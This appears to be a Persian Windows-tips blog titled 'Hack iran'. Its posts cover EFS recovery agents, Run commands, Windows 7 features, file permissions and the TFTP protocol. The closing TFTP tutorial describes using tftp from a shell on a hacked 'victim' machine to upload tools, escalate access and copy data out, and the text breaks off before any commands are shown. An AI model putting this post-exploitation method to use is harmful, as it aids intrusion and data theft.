loading...
███▓▒░░◄ Hack iran►░░▒▓███
مرتضی(Germany) بازدید : 201 چهارشنبه 20 اردیبهشت 1391 نظرات (5)

شما به عنوان يك مدير شبكه با انجام این سناريو مي توانيد فايل ها يا فولدرهاي Encrypt شده هر كدام از كاربران يك سيستم که عمل Encryption را پس از انجام این سناریو اعمال کرده باشند را مشاهده نماييد.

ابتدا با يك User Account كه داراي دسترسي Administrator است Login كنيد سپس command prompt را باز كرده و دستور زير را در آن تايپ كرده و اينتر كنيد:

cipher /r:Eagent
سپس با عبارت زير مواجه مي شويد
Please type in the password to protect your .PFX file:
در پاسخ بايد password دلخواهي را وارد نماييد كه بعدا مورد استفاده قرار مي گيرد و سپس آنرا تاييد نماييد.
حال با مشاهده پيام زير command prompt را close نماييد:
Your .CER file was created successfully.

Your .PFX file was created successfully.

اكنون دو فايل Eagent.cer و Eagent.pfx در مسيري كه در command prompt بوده است (مثلا در تصوير فوق در آدرس C:Documents and SettingsAmiN) ذخيره شده اند.
جهت رعايت مسائل امنيتي بهتر است ايندو فايل را در يك حافظه جانبي ديگر مانند فلاپي ذخيره نماييد.

حال Certificates Managerرا با تايپ كردن certmgr.msc داخل Run باز كنيد.
از قسمت سمت چپ به Personal رفته و روي آن رايت كليك كنيد
سپس All Tasks و بعد Import را انتخاب نماييد. اكنون Certificate Import Wizard را مشاهده مي كنيد،
بر روي Next كليك كرده و در صفحه بعد روي Browse كليك كرده و پنجره Open در قسمت Files of type عبارت Personal Information Exchange (*.pfx,*.P12) را انتخاب كرده و فايل Eagent.PFX را انتخاب نماييد، Open و سپس Next را بزنيد.
حال در قسمتي كه از شما Password خواسته شده است بايد هماني را وارد كنيد كه در ابتدا براي دستور cipher انتخاب كرده ايد؛
با زدن Next به صفحه بعد رفته و عبارت Automatically select the certificate store based on the type of certificate را انتخاب كرده، Next و سپس Finish را بزنيد.
با مشاهده پيام Import was successful روي OK كليك نماييد.
اكنون Local Security Policy را با تايپ كردن secpol.mscداخل Run باز كنيد.
به داخلPublic Key Policies رفته و روي Encrypted File System رايت كليك كرده و Add Data Recovery Agent... را انتخاب كنيد.
در ويزارد باز شده روي Next و سپس Browse Folders كليك كنيد فايل Eagent.cer را انتخاب كرده و Open را بزنيد. سپس روي Next و Finish كليك كنيد.
از اين به بعد با اين User Account مي توانيد تمامي فايل ها يا فولدرهاي Encrypt شده هر كدام از كاربران يك سيستم را مشاهده نماييد.
مرتضی(Germany) بازدید : 106 چهارشنبه 20 اردیبهشت 1391 نظرات (0)

شما میتوانید با استفاده از این ترفند تمام اطلاعات ویندوز خود را تنها و با تایپ یک عبارت مشاهده کنید. این اطلاعات عبارتند ازاطلاعات مدیریتی ویندوز، حسابهای کاربری، نرم افزارهای نصب شده، سخت افزارها، سرویس ایمیل، سرویس خبری، نسخه ویندوز و بسیاری از اطلاعات دیگر که شما میتوانید حتی آن ها را در یک قالب متنی بر روی کامپیوتر ذخیره کنید.

بدین منظور:

از منوی Start وارد Run شوید.
عبارت NETSH DIAG GUI را وارد کرده و Enter بزنید.
حال چند ثانیه ای صبر کنید و در پنجره باز شده بر روی Scan your system کلیک کنید.
بررسی اطلاعات (ترفندستان) اندک زمانی طول میکشد و سپس تمامی اطلاعات برای شما نمایش داده خواهد شد.
شما می توانید با استفاده از دکمه ...Save to file در قالب یک متن html این اطلاعات را ذخیره نمایید.
برای مشاهده فایل ذخیره شده بر روی Show Saved File کلیک کنید یا مستقیمأ به پوشه WINDOWSpchealthhelpctrSystemNetDiag مراجعه کنید.

مرتضی(Germany) بازدید : 292 چهارشنبه 20 اردیبهشت 1391 نظرات (1)

سلام دوستان. یه آموزش ساده ولی بدردبخور رو میخوام بگم که واقعا مهم هست.
با استفاده از این آموزش میتونید از اینکه شخصی که آی پی شما رو میدونه به کامپیوترتون نفوذ کنه جلوگیری کنید.
روی My computer کلیک راست کنید و Properties رو انتخاب کنید. (اگه ویندوزتون 7 هست بعد از اینکار قسمت Remote Settings رو انتخاب کنید.) بعدش سربرگ Remote . اونجا بالاش یک یا جند تا چیز میبینید که تیک دارن. تیک هاشون رو بردارید. اون پایین هم Don't Allow Connections to this computer رو انتخاب کنید. بعدش Apply یا OK بزنید که تغییرات اعمال بشه.
امیدوارم مفید واقع شده باشه.

مرتضی(Germany) بازدید : 104 چهارشنبه 20 اردیبهشت 1391 نظرات (0)

113 دستور قابل اجرا در Run
از منوی Start میتوانید گزینه Run را انتخاب کنید و این دستور ها را در آن وارد کنید:
(سرچ کردم دیدم پست کاملی در این باره نبود گفتم اینو بزارم دوستان استفاده کنن)


Too Access---->Accessibility Controls



---->Run Command >----access.cpl

---------------------------------------
Add Hardware Wizard


hdwwiz.cpl

---------------------------------------
Add/Remove Programs


appwiz.cpl

----------------------------------------
Administrative Tools


control admintools

----------------------------------------
Automatic Updates


wuaucpl.cpl

----------------------------------------
Bluetooth Transfer Wizard


fsquirt

----------------------------------------
Calculator


calc

----------------------------------------
Certificate Manager


certmgr.msc

----------------------------------------
Character Map


charmap

----------------------------------------
Check Disk Utility


chkdsk

----------------------------------------
Clipboard Viewer


clipbrd

----------------------------------------
Command Prompt


cmd

----------------------------------------
Component Services


dcomcnfg

----------------------------------------
Computer Management


compmgmt.msc

----------------------------------------
Date and Time Properties


timedate.cpl

----------------------------------------
DDE Shares


ddeshare

----------------------------------------
Device Manager


devmgmt.msc

----------------------------------------
Direct X Control Panel (If Installed)*


directx.cpl

----------------------------------------
Direct X Troubleshooter


dxdiag

----------------------------------------
Disk Cleanup Utility


cleanmgr

----------------------------------------
Disk Defragment


dfrg.msc

----------------------------------------
Disk Management


diskmgmt.msc

----------------------------------------
Disk Partition Manager


diskpart

----------------------------------------
Display Properties


control desktop

----------------------------------------
Display Properties


desk.cpl

----------------------------------------
Display Properties (w/Appearance Tab Preselected)


control color

----------------------------------------
Dr. Watson System Troubleshooting Utility


drwtsn۳۲

----------------------------------------
Driver Verifier Utility


verifier

----------------------------------------
Event Viewer


eventvwr.msc

----------------------------------------
File Signature Verification Tool


sigverif

----------------------------------------
Findfast


findfast.cpl

----------------------------------------
Folders Properties


control folders

----------------------------------------
Fonts


control fonts

----------------------------------------
Fonts Folder


fonts

----------------------------------------
Free Cell Card Game


freecell

----------------------------------------
Game Controllers


joy.cpl

----------------------------------------
Group Policy Editor (XP Prof)


gpedit.msc

----------------------------------------
Hearts Card Game


mss

----------------------------------------
Iexpress Wizard


iexpress

----------------------------------------
Indexing Service


ciadv.msc

----------------------------------------
Internet Properties


inetcpl.cpl

----------------------------------------
IP Configuration (Display Connection Configuration)


ipconfig /all

----------------------------------------
IP Configuration (Display DNS Cache Contents)


ipconfig /displaydns

----------------------------------------
IP Configuration (Delete DNS Cache Contents)


ipconfig /flushdns

----------------------------------------
IP Configuration (Release All Connections)


ipconfig /release

----------------------------------------
IP Configuration (Renew All Connections)


ipconfig /renew

----------------------------------------
IP Configuration (Refreshes DHCP & Re-Registers DNS)


ipconfig /registerdns

----------------------------------------
IP Configuration (Display DHCP Class ID)


ipconfig /showclassid

----------------------------------------
IP Configuration (Modifies DHCP Class ID)


ipconfig /setclassid

----------------------------------------
Java Control Panel (If Installed)


jpicpl۳۲.cpl

----------------------------------------
Java Control Panel (If Installed)


javaws

----------------------------------------
Keyboard Properties


control keyboard

----------------------------------------
Local Security Settings


secpol.msc

----------------------------------------
Local Users and Groups


lusrmgr.msc

----------------------------------------
Logs You Out Of Windows


logoff

----------------------------------------
Microsoft Chat


winchat

----------------------------------------
Minesweeper Game


winmine

----------------------------------------
Mouse Properties


control mouse

----------------------------------------
Mouse Properties


main.cpl

----------------------------------------
Network Connections


control netconnections

----------------------------------------
Network Connections


ncpa.cpl

----------------------------------------
Network Setup Wizard


netsetup.cpl

----------------------------------------
Notepad


notepad

----------------------------------------
Nview Desktop Manager (If Installed)


nvtuicpl.cpl

----------------------------------------
Object Packager


packager

----------------------------------------
ODBC Data Source Administrator


odbccp۳۲.cpl

----------------------------------------
On Screen Keyboard


osk

----------------------------------------
Opens AC۳ ****** (If Installed)


ac۳filter.cpl

----------------------------------------
Password Properties


password.cpl

----------------------------------------
Performance Monitor


perfmon.msc

----------------------------------------
Performance Monitor


perfmon

----------------------------------------
Phone and Modem Options


telephon.cpl

----------------------------------------
Power Configuration


powercfg.cpl

----------------------------------------
Printers and Faxes


control printers

----------------------------------------
Printers Folder


printers

----------------------------------------
Private Character Editor


eudcedit

----------------------------------------
Quicktime (If Installed)


QuickTime.cpl

----------------------------------------
Regional Settings


intl.cpl

----------------------------------------
Registry Editor


regedit

----------------------------------------
Registry Editor


regedit۳۲

----------------------------------------
Remote Desktop


mstsc

----------------------------------------
Removable Storage


ntmsmgr.msc

----------------------------------------
Removable Storage Operator Requests


ntmsoprq.msc

----------------------------------------
Resultant Set of Policy (XP Prof)


rsop.msc

----------------------------------------
Scanners and Cameras


sticpl.cpl

----------------------------------------
Scheduled Tasks


control schedtasks

----------------------------------------
Security Center


wscui.cpl

----------------------------------------
Services


services.msc

----------------------------------------
Shared Folders


fsmgmt.msc

----------------------------------------
Shuts Down Windows


shutdown

----------------------------------------
Sounds and Audio


mmsys.cpl

----------------------------------------
Spider Solitare Card Game


spider

----------------------------------------
SQL Client Configuration


cliconfg

----------------------------------------
System Configuration Editor


sysedit

----------------------------------------
System Configuration Utility


msconfig

----------------------------------------
System File Checker Utility (Scan Immediately)


sfc /scannow

----------------------------------------
System File Checker Utility (Scan Once At Next Boot)


sfc /scanonce

----------------------------------------
System File Checker Utility (Scan On Every Boot)


sfc /scanboot

----------------------------------------
System File Checker Utility (Return to Default Setting)


sfc /revert

----------------------------------------
System File Checker Utility (Purge File Cache)


sfc /purgecache

----------------------------------------
System File Checker Utility (Set Cache Size to size x)


sfc /cachesize=x

----------------------------------------
System Properties


sysdm.cpl

----------------------------------------
Task Manager


taskmgr

----------------------------------------
Telnet Client


telnet

----------------------------------------
User Account Management


nusrmgr.cpl

----------------------------------------
Utility Manager


utilman

----------------------------------------
Windows Firewall


firewall.cpl

----------------------------------------
Windows Magnifier


magnify

----------------------------------------
Windows Management Infrastructure


wmimgmt.msc

----------------------------------------
Windows System Security Tool


syskey

----------------------------------------
Windows Update Launches


wupdmgr

----------------------------------------
Windows XP Tour Wizard


tourstart

----------------------------------------
Wordpad

مرتضی(Germany) بازدید : 132 چهارشنبه 20 اردیبهشت 1391 نظرات (0)

این روزها بسیاری از کاربران در تب و تاب تهیه و نصب ویندوز 7 هستند. تعریف*ها و نقدهای مختلفی که از ویندوز 7 شده باعث شده است که بسیاری از کاربران که تجربه خوبی از ویندوز ویستا نداشته*اند به این ویندوز جدید تمایل پیدا کنند. علاوه بر آن آمار کاربرانی که پس از استفاده از این ویندوز از آن اعلام رضایت کردند بالا بوده و این موضوع نوید روزهای خوشی را برای مایکروسافت به ارمغان آورده است. اما در این میان عده*ای از کاربران هستند که عقیده خاصی را دنبال می*کنند. آن*ها معتقدند که ویندوز 7، همان ویندوز ویستا است که توسط مایکروسافت کمی کاربر پسند*تر شده است. در نتیجه همچنان ویندوز XP را ترجیح می*دهند. اما شاید واقعیت چیز دیگری باشد. تفاوت*های بین ویندوز 7 و ویستا قطعاً چیزی فراتر از یک تغییرات کوچک است. در این ترفند قصد داریم به معرفی 18 قابلیت جالبی بپردازیم که در ویندوز ویستا و سایر ویندوزها از هیچ یک از آن*ها خبری نبود. قابلیت*هایی که هر یک به خودی خود یک تغییر جدی محسوب می*شود.

1. لرزاندن پنجره*ها

فرض کنید چندین پنجره مختلف را به طور همزمان در محیط ویندوز باز کرده*اید. در نسخه*های پیشین ویندوز برای اینکه این پنجره*ها را ببندید، ناچار بودید تک تک پنجره*ها Close یا Minimize کنید. اما با استفاده از این قابلیت جدید در ویندوز 7 که Aero Shake نام دارد، کافی است تا پنجره*ای که قصد دارید آن را باز نگه دارید را گرفته و با استفاده از ماوس کمی آن را بلرزانید. خواهید دید که سایر پنجره*ها Minimize خواهند شد. با انجام مجدد این کار پنجره*های کوچک شده مجدداً بازیابی خواهند شد. به این قابلیت در این ترفند به تفصیل پرداخته شده است.

2. لیست پرش

یکی از قابلیت*های فوق*العاده*ای که در ویندوز 7 اضافه شده است و باعث صرفه جویی زیادی در وقت می*شود «لیست پرش» یا Jumplist است. شما توسط برنامه*های نصب شده بر روی ویندوز فایل*های مختلفی را فراخوانی می*کنید. به عنوان مثال توسط نرم افزارهای Player، فایل*های موزیک را اجرا می*کنید. یا توسط نرم افزار Notepad فایل*های متنی را باز می*کنید. اکنون با استفاده از «لیست پرش» میتوانید به آخرین فایلهای باز شده توسط نرم افزارهای مختلف دسترسی داشته باشید بدون اینکه نیاز به اجرای اولیه برنامه مربوطه باشد. برای دسترسی به «لیست پرش» کافی است بر روی آیکن برنامه در Taskbar راست کلیک کنید تا آخرین فایلهای فراخوانده شده توسط این نرم افزار برایتان لیست شود. همچنین میتوانید در منوی Start، با کلیک بر روی فلش موجود در کنار هر برنامه به «لیست پرش» مربوط به آن برنامه دسترسی پیدا کنید.

3. توسعه پیش نمایش پنجره*ها

در ویندوز ویستا، با عبور ماوس از روی پنجره*های Minimize شده در Taskbar، پیش نمایشی از پنجره*ها در یک سایز کوچک نمایش داده می*شد. اکنون در ویندوز 7 این قابلیت توسعه داده شده است. به طوری که با قرار دادن ماوس بر روی پیش نمایش (ترفندستان) امکان بستن آن نیز وجود دارد. همچنین پنجره*های چندگانه دارای چندین پیش نمایش هستند و علاوه بر آن با استفاده از کلید ترکیبی Win+T امکان گردش میان پیش نمایش*ها وجود دارد.

4. مرتب*سازی پنجره*ها در صفحه به روشی جدید

یکی از قابلیت*های جالبی که در ویندوز 7 شاهد هستیم امکان منظم کردن و تغییر اندازه پنجره*ها در محیط ویندوز به شکلی جالب و ساده است. کافی است یک پنجره را با استفاده از ماوس بگیرید، سپس آن را به بالای صفحه مانیتور بکشید، پس از پدیدار شدن یک هاله، با رها کردن ماوس، پنجره کل صفحه را اشغال می*کند. همچنین اگر پنجره را به منتهی الیه سمت راست یا چپ مانیتور بکشید و آن را رها کنید، پنجره نیمی از صفحه را اشغال می*کند.

5. ویندوز XP در ویندوز 7

یکی از مشکلاتی که کاربران در ویندوز ویستا زیاد با آن سر و کار داشتند عدم اجرای برخی برنامه*های سازگار با ویندوز XP در محیط ویندوز ویستا بود. مایکروسافت در ویندوز 7 چاره*ای برای این مشکل پیدا کرده است. با استفاده از XP Mode شما می*توانید به طور مجازی ویندوز XP را در دل ویندوز 7 داشته باشید و با استفاده از آن هر برنامه سازگار با XP را همانند گذشته اجرا کنید. برای استفاده از XP Mode شما ابتدا بایستی نرم افزاری به نام Windows Virtual PC را دانلود و نصب کنید. سپس XP Mode را در درون آن اجرا نمایید. برای دانلود این دو می*توانید از http://www.microsoft.com/windows/vir.../download.aspx اقدام نمایید.

6. یک راه ساده و سریع برای تنظیم صفحات نمایش چندگانه

آیا تاکنون پیش آمده که کامپیوتر خود را به بیش از یک مانیتور یا پروژکتور متصل نمایید؟ در ویندوز 7 تنظیم این صفحان نمایش چندگانه در یک ثانیه امکان پذیر است! کافی است کلیدهای ترکیبی Win+P را فشار دهید و تنظیمات صفحه نمایش را اعمال نمایید.

7. رابط کاربری بهتر در خصوص دستگاه*های جانبی متصل به کامپیوتر

در ویندوز 7، پس از کلیک (ترفندستان) بر روی منوی Start بخش جدیدی به نام Devices and Printers به چشم می*خورد. در این بخش دستگاه*های متصل به کامپیوتر اعم از پرینتر و حافظه*های قابل حمل با تصویر مرتبط به هر کدام وجود دارد. با راست کلیک بر روی هر یک از دستگاه*ها امکانات منحصر به فردی نظیر آپدیت و تنظیمات قابل دسترسی است.

8. ویرایش محدوده اطلاع رسانی

در ویندوز XP و ویندوز ویستا در سمت راست محیط Taskbar محدوده*ای به نام اطلاع رسانی یا Notification Area وجود داشت. این محدوده در ویندوز 7 هم وجود دارد اما با انعطافی بسیار بیشتر که می*توان این محدوده را ویرایش و یا حتی حذف کرد. بر روی فضای خالی از این محدوده راست کلیک کنید و Customize notification icons را انتخاب نمایید. در این پنجره می*توانید نمایش یا عدم نمایش آیکن*های مربوط به هر نرم افزار را تعیین کنید. علاوه بر آن با کلیک بر روی Turn system icons on or off می*توانید نمایش یا عدم نمایش آیکن*های مربوط به خود ویندوز نظیر ساعت ویندوز را تنظیم نمایید.

9. ضبط کننده قدم به قدم مشکلات

یکی دیگر از قابلیت*های کاربردی جدید در ویندوز 7 «ضبط کننده قدم به قدم مشکلات» یا Problem Steps Recorder است. با استفاده از PSR شما می*توانید مشکلات موجود در ویندوز خود را به صورت قدم به قدم با استفاده از تصویر ذخیره نمایید و آن را جهت دریافت کمک در اختیار دیگران قرار دهید. این قابلیت در این ترفند به تفصیل بررسی شده است.

10. ذره*بین جدید

Magnifier یا ذره*بین در ویندوز XP و ویستا نیز وجود داشت، اما در ویندوز 7 با یک ذره*بین حرفه*ای طرف هستیم. برای دسترسی به ذره*بین در منوی Start عبارت Magnifier را وارد نموده و Enter بزنید. در Magnifier جدید شما می*توانید درصد بزرگ*نمایی را تعیین کنید. علاوه بر آن 3 حالت بزرگ*نمایی خواهید داشت. Full Screen که حالت تمام صفحه است و کل صفحه بزرگ خواهد شد که با حرکت ماوس کل صفحه درگیر خواهد بود. نوع دیگر حالت Lens است که یک صفحه کوچک با ماوس همراه خواهد شد که تمام بزرگ*نمایی در این صفحه رخ می*دهد و عملکردی دقیقاً مشابه یک ذره*بین خواهد داشت. آخرین حالت Docked است که یک صفحه ذره*بینی در بالا یا هر قسمت دیگری از صفحه به صورت ثابت قرار خواهد داد و تصاویر بزرگ شده در آن پدیدار خواهند شد. از Magnifier جهت کاربردهای آموزشی استفاده می*گردد.

11. یک راه جدید برای مشاهده فایل*های صوتی و تصویری

Windows Media Player در ویندوز 7 بسیار توسعه پیدا کرده است. عمده*ترین پیشرفت آن باز شدن یک پخش کننده کوچک به هنگام پخش فایل*های صوتی و تصویری است. پیشنهاد می*شود پیش از این که Player جدیدی را برای استفاده بر روی ویندوز نصب کنید، این ظاهر کاربر پسند Windows Media Player در ویندوز 7 را امتحان کنید.

12. عملیات به اشتراک گذاری در شبکه*های خانگی

در ویندوز ویستا و سایر نسخه*های ویندوز، ساخت شبکه*های خانگی و به اشتراک*گذاری منابع کاری دشوار بود. اما با استفاده از Wizard جدید موجود در ویندوز 7 به نام Homegroup شما می*توانید فولدرهایی که قصد به اشتراک*گذاری آن*ها را دارید را انتخاب کنید. سپس رمز عبوری که دریافت می*کنید را در کامپیوتر دیگر وارد نمایید تا به همین سادگی عملیات به اشتراک*گذاری صورت بگیرد. اما نکته*ای که وجود دارد این است که تنها کامپیوترهای دارای ویندوز 7 می*توانند چنین کاری را صورت دهند. جهت دسترسی به این قابلیت عبارت Homegroup را در منوی Start وارد کنید و Enter بزنید.

13. اجرای مستقیم فایل صوتی و تصویری از یک کامپیوتر دیگر

با استفاده از قابلیت جدیدی (ترفندستان) که در ویندوز 7 وجود دارد، در کامپیوترهای تحت شبکه Homegroup، نرم افزار Windows Media Player این امکان را به شما می*دهد که فایل صوتی و تصویری مستقیماً از یک کامپیوتر اجرا شده و توسط اسپیکر کامپیوتر دیگر متصل به شبکه پخش شود! به عنوان مثال اگر یک لپتاپ و یک PC را شبکه کرده*اید، از این پس می*توانید فایل*های موزیک موجود در لپتاپ را به وسیله اسپیکرهای کامپیوتر رومیزی با صدای بلند گوش کنید!

14. یک مرکز امنیتی جدید

Action Center نام محیط امنیتی جدیدی است که در ویندوز 7 گنجانده شده است. در محیط Action Center اطلاع رسانی*هایی نظیر آپدیت ویندوز، آپدیت آنتی ویروس، یادآوری پشتیبان*گیری و نظایر آن درج می*گردد. برای دسترسی به آن در منوی Start عبارت Action Center را وارد نموده و Enter بزنید.

15. سنجاق کردن برنامه*ها به Taskbar

در ویندوز 7، میتوانید جهت دسترسی سریع*تر به برنامه*ها آن*ها را در Taskbar سنجاق کنید. به طوریکه همواره در محیط Taskbar حضور داشته باشند و حتی با بستن برنامه نیز از Taskbar خارج نشوند. برای این کار کافی است بر روی آیکن برنامه در Taskbar راست کلیک کنید و Pin this program to taskbar را انتخاب کنید.

16. توسعه استفاده از قابلیت*های لمسی

این قابلیت به طور خاص مختص به صفحه نمایش*های لمسی است. در صورتی که از یک صفحه نمایش لمسی استفاده می*کنید با نصب ویندوز 7 یک تجربه شیرین از کار با دست و ویندوز 7 خواهید داشت! Taskbar بزرگ*تر و آیکن*های مربع شکل باعث راحتی کار با دست خواهند شد. علاوه بر آن اگر از Macbookها که از قابلیت Multi Touch نیز پشتیبانی می*کنند استفاده کنید همه چیز فوق العاده*تر خواهد شد! چرا که می*توانید پنجره*ها را با دو انگشت بگیرید و اندازه آن*ها را کوچک و بزرگ کنید. درست همانند آی*فون! (ترفندستان)

17. رایت فایل*های ISO

همان طور که احتمالاً می*دانید فایل*های Image مربوط به DVDها که در اصل فایل*های فشرده آماده رایت بر روی DVD*ها هستند با فرمت ISO وجود دارند. نرم افزارهایی نظیر Nero کار رایت آن*ها را بر روی DVD صورت می*دهند. اما از این پس با استفاده از ویندوز 7 نیازمند هیچ برنامه جانبی نخواهید بود. کافی است بر روی فایل ISO خود دوبار کلیک کنید تا پنجره*ای به نام Windows Disk Image Burner باز شود و از طریق آن فایل Image خود را بر روی DVD به سادگی رایت کنید.

18. سنجش رنگ صفحه نمایش

در ویندوز 7 قابلیتی به نام Display Color Calibration اضافه شده است که کار اصلی آن سنجش میزان درستی رنگ*های نمایش داده شده بر روی صفحه است. به عنوان مثال یک HDTV را به کامپیوتر خود وصل کرده*اید و قصد دارید تا به بیشترین کیفیت ممکن دست پیدا کنید. برای دسترسی به این قابلیت در منوی Start عبارت Display Color Calibration را وارد نموده و Enter بزنید.

مرتضی(Germany) بازدید : 133 سه شنبه 19 اردیبهشت 1391 نظرات (0)

ایجاد سیاستهای امنیتی
شما با ایجاد User Profile روی PC خود امنیت بیشتری را روی سیستم کامپیوتری خود ایجاد خواهید کرد. به Control Panel بروید و برروی User Option کلیک کنید و مراحل نصب را که بصورت Wizard است دنبال کنید.
اگر از Windows 95 استفاده می کنید برای رفتن به قسمت UserProfile باید Passwords Options را انتخاب کنید. پس از Restart و Login به ویندوز ، نام و کلمه عبور خود را وارد کنید که در این هنگام ویندوز به شما پیغام ایجاد Profile جدید را می دهد. حال با ساخت UserProfile قادر به استفاده از System Policy Editor جهت ایجاد محدودیت مورد نظرتان خواهید شد. قبل از استفاده از Policy Editor ، از Registry و سایر فایلهای Password دستگاه خود نسخه پشتیبان تهیه نمایید. کامپیوتر خود را Restart نمایید و در قسمت Login دکمه Cancle را انتخاب کنید. این عمل بیانگر Setting برای افراد غیر مجاز است. Policy Editor را با تایپ Poledit در قسمت Run آغاز کنید.
به File > Open Registry رفته و روی Local Users دبل کلیک کنید و در این قسمت گزینه های مورد نظر خود را برای محدود کردن دسترسی کاربران انتخاب کنید. پس از انجام کار Finish را انتخاب نمایید.
مرتضی(Germany) بازدید : 121 سه شنبه 19 اردیبهشت 1391 نظرات (0)

سلام امروز می خوام نحوه ی قفل گذاری فایلها و پوشه های شخصی را بهتان یاد بدم

1: ابتدا وارده درایوی که در آن فایل شخصیتان هست یا پوشه که که در آن فرار داده اید شوید


سپس کلید سمت راست موس را زده و وارده properties شوید و سپس وارده security شوید


بر روی advanced کلیک کرده حال یک پنجره واستون باز میشه : advanced security ..


حال بر روی change Permissions کلیک کنید


در صفحه ی جدید بر روی edit کلیک کنید در صفحه ی جدید یعنی permission entry


دو گزینه را مشاهده می کنید :


1:allow


2: Deny


2: من در اینجا یک فایل تکست را در نظر می گیرم و هدفم اینست که می خوام کسی نتونه


فایل تکست من را بخونه برای اینکار از قسمت Permissions گزینه ی


List folder / read data


را در قسمت deny تیک می زنم در این حال کسی نخواهد تونست مطلبی که در فایل تکست


من هست را بخونه


حال می خوام کاری کنم که کسی نتونه یک فولدر در صفحه ی شخصی من ایجاد کنه و همچنین


می خوام کاری کنم که کسی نتونه متنی را در فایل تکست من بنویسه و آنرا سیو کنه


برای اینکار بر روی دوگزینه ی write attributees و write extended


تیک بزنید


حال برای جلو گیری از ساخت فولدر بر روی گزینه ی روی create files و create folder


تیک بزنید


و در کل برای غیر فعال کردن پوشه ای که در آن اطلاعات شخصی هست در قسمت


full control بر روی deny کلیک کنید تا همه گزینه ها تیک شوند


برای بازگرداندن به حالت اولیه در قسمت full control در قسمت allow کلیک کنید


موفق باشید

مرتضی(Germany) بازدید : 412 سه شنبه 19 اردیبهشت 1391 نظرات (0)

با توجه به اینکه امروزه میشه با همه پسوند ها یه فایل تروجانی یا هک ساخت از mp3 و jpg و gif و .... بگیر تا هر چی که فکرشو بکنی

بنده تصمنیم گرفتم واسه اینکه خیالتون کمی راحت بشه چند سایت متخصص اینکار بهتون مهرغی کنم


این سایت ها میان فایل ها رو با برترین و قدرتمندترین آنتی یوروس های دنیا به صورت آنلاین و همیشه آپدیت تست میکنند که اگر فایل مشکوک بود بهتون میگه که کودوم انتی یوروس این فایل رو مشکوک و یا حتی ویروسی شناسایی میکنه

فایل دانلود برنامه در ادامه مطلب

مرتضی(Germany) بازدید : 252 سه شنبه 19 اردیبهشت 1391 نظرات (0)

TFTP خلاصه Trivial File Transfer Protocol است که بر روی پورت 69 کار می کند. تفاوت آن با FTP در اینست که FTP از TCP استفده می کند ولی TFTP ازUDP استفاده می کند که البته FTP دارای ثبات و اطمینان قابل قبولی هست در صورتی که TFTP سرعت را برای ما به ارمغان می آورد. نکته جالب توجه در این است که TFTP احتیاجی به پسورد ندارد. جابجایی در اینجا بدین شکل است که client از server در خواست (نوشتن)write یا (خواندن)read می کند که معمولا همان درخواست Read (PRQ) مورد قبول واقع می شود و با قبول شدن در خواست از سوی سرور ارتباط میان آن دو بر قرار می گردد و جایجایی اطلاعات آغاز می گردد. در ترانسفر packet/block جابجایی تا 512بایت آنجام شده و سپس سرور منتظر جواب دریافت(ACK) از سوی کلاینت میشود و بعد از دریافت جواب دوباره 512 بایت یعدی را می فرستد و برای هر 512بایت این کار تکرار میشود . هر یک از بلاک های دریافتی به انتهای بلاک قبلی متصل میشود اگر در این حین یکی از packet گم گردد هر دوی کلاینت و سرور یک time-out ایجاد نموده و دوباره همان packet گم شده را ارسال می کند. همیشه فرستنده باید آخرین بلاک را در حافظه نگهداری نمایید تا زمانی که پیام ACK را دریافت نماید البته اگر آخرین بلاک از فایل باشد دیگر احتیاجی به صبر کردن و نگهداری بر روی حافظه نیست. 0 mode 0 Filename 01 پیام های TFTP خواندن پیام در خواست 01 نشان دهنده 2 بایت از دستور OPcode network byte که طرف مقابل می گویید این یک READمی باشد. Filename یک رشته null terminated ascii می باشد که نام فایل را به همراه دارد. Mode یک رشته null terminated ascii می باشد که نوع جابجایی را در خود دارد. نوشتن پیام در خواست 0 mode 0 Filename 02 توضیحان این بخش هم مثل بالا می باشد با این تفاوت که 01 برای WRITE می باشد. TFTP Data Packet / Message Data 0 to 512bytes Block # 03 03 2 بایت از دستور OPcode network byte که می گوید در طرف مقبل داده ها قرار دارد. Block # 2 بایت از دستور bytes block number network byte Data 0 to 512bytes همه پکت دیتا ها 512 یایت در خود دارند غیر از آخری جواب Block # 04 04 2 بایت از دستور OPcode network byte که معلوم می کند برای طرف دیگر که ACK می باشد. Block # 2 بایت از دستور block number network byte انواع Error ها 0 errstring errcode 05 05 2 بایت از دستور OPcode network byteکه به طرف مقابل می گویید این یک Error می باشد. Errcode 2 بایت از دستور error code network byte می باشد. Errstring یک رشته null terminated ascii error و error code ها به ترتیب زیرند: 0 - Not defined. 1 - File not found. 2 - Access violation. 3 - Disk full. 4 - Illegal TFTP operation. 5 - Unknown port. 6 - File already exists. 7 - No such user و طریقه های TFTP ترانسفر دو دسته می باشند: 1. netascii که برای انتقالtext فایل ها استفاده شده که البته دو طرف باید برای دریافت و فرستادن به این روش آماده باشند 2. octet که برای انتقال فایل هایbinary مورد استفاده قرار می گیرد.
======
آموزش استفاده از Tftp .

Tftp ) (trivial file transfer Protocolپروتكلي ساده و جمع وجور براي انتقال اطلاعات از طريق شبكه است به وسيله Noel Chiappa طراحي شده است و در RFC 1350 در مورد اين پروتكل بحث شده .

TFTP تنها قابليت خواندن و نوشتن اطلاعات روي سرور راه دور را دارد. براي اين منظور يعني انتقال اطلاعات روي سرور بايد از سرور TFTP كه TFTPd نام دارد استفاده كرد يعني ابتدا روي كامپيوتري كه مي خواهيم به عنوان سرور عمل كند TFTPd را RUN كرده بعد به وسيله TFTP عمليات انتقال و دريافت اطلاعات را انجام دهيم مي توانيد از اين آدرس يك TFTPd دانلود كنيد
http://www.winagents.com/downloads/tftpsetup.exe

خوب حالا شما بايد نحوه كار اين سرور و كلاينت يعني tftp و tftpd را بياموزيد.
ما براي مثال وقتي كه يك كامپيوتر را به وسيلة اكسپلويتي هك مي كنيم يك شل از آن كامپيوتر مي گيريم خوب در اين مرحله قطعا ما تمايل داريم كه يك سري نرم افزار روي سيستم قرباني دانلود كنيم و سطح دسترسي خود را به سيستم قرباني بالا ببريم يا يك سري اطلاعات از كامپيوتر قرباني بر روي سيستم خود دانلود كنيم براي اين منظور بهترين و ساده ترين ابزار همين tftp است كه همراه سيستم عامل نيز وجود دارد و در آدرس %systemroot%/system32/ قرار دارد و شما وقتي كه يك شل گرفته ايد به راحتي مي توانيد ان را اجرا كنيد ولي بايد در ابتدا يك tftpd روي سيستم خود اجرا كرده تا سيستم شما سروري براي اين نرم افزار باشد براي اين منظور اگر همين tftpd كه در اين مقاله لينك دانلودش قرار داده شده است استفاده كنيد بايد مراحل زير را انجام دهيد:
ابتدا Tftpd32.exe را اجرا كنيد(شكل زير):
